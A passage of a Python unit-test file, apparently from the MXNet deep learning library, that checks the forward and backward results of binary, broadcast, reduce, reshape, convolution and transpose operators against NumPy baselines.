l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
d = gen_broadcast_data(idx);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
d = gen_binary_data(dummy);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
y.forward(is_train=True)
y.backward([mx.nd.array(out)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
@with_seed()
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
@with_seed()
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
@with_seed()
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net.bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net.bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
@with_seed()
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@with_seed()
def test_reshape():
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
# Test new api (Using shape)
test_cases = [
[(2, 3, 5, 5), (0, -1), False, (2, 75)],
[(2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)],
[(5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)],
[(2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)],
[(2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)],
[(2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)],
[(2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)],
[(2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)],
[(2, 3, 5, 6), (-3, -3), False, (6, 30)],
[(2, 3, 5, 6), (-3, -1), False, (6, 30)],
[(64,), (-4, 16, 4), False, (16, 4)],
[(64,), (-4, 16, -1), False, (16, 4)],
[(64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)],
[(2, 3, 5, 5), (0, -1), True, (5, 30)],
[(2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)],
[(5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)],
[(2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)],
[(2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)],
[(2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)],
[(2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)],
[(2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)],
[(2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)],
[(2, 3, 5, 6), (-3, -3), True, (6, 30)],
[(64,), (16, 4, -4), True, (16, 4)],
[(64,), (16, -1, -4), True, (16, 4)],
[(1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16)]]
for test_case in test_cases:
test_reshape_new(*test_case)
# Test old api
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net.simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
@with_seed()
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
# for test_case in test_cases:
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
@with_seed()
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
equal_forward = almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, 1E-4, 1E-4)
assert equal_forward
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
equal_backward = almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, 1E-4, 1E-4)
assert equal_backward
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
@with_seed()
def test_broadcast():
sample_num = 200
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
@with_seed()
def test_transpose():
for ndim in range(1, 7):
for t in range(5):
dims = list(np.random.randint(1, 10, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_pseudo2dtranspose():
def getTwoInts(mn, mx):
n1 = np.random.randint(mn, mx)
n2 = np.random.randint(mn, mx-1)
n2 = n2 if n2 < n1 else n2+1
return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
